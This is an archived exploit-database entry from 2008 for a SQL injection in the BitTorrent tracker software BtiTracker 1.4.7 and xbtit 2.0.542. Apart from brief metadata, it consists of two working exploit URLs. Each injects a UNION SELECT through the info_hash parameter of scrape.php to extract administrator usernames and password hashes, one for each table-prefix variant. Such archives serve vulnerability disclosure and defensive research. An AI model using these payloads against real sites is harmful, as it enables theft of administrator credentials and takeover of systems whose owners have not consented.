BtiTracker 1.4.7 / xbtit 2.0.542 - SQL Injection

EDB-ID:

6296


Author:

InATeam

Type:

webapps


Platform:

PHP

Date:

2008-08-25


## BtiTracker/xBtiTracker Remote SQL Injection Vulnerability
## Author: InATeam (http://inattack.ru/)
## Affected versions: BtiTracker <= 1.4.7, xBtiTracker <= 2.0.542
## Software site: http://www.btiteam.org/
##
## ==============================================================================
## Exploit:
## ==============================================================================
## http://site/scrape.php?info_hash=1%27)
## +UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0
## +FROM+users+WHERE+id_level=8/*
## ==============================================================================
## for xBtiTracker we need to specify prefix:
## ==============================================================================
## http://site/scrape.php?info_hash=1%27)
## +UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0
## +FROM+xbtit_users+WHERE+id_level=8/*
## ==============================================================================

# milw0rm.com [2008-08-25]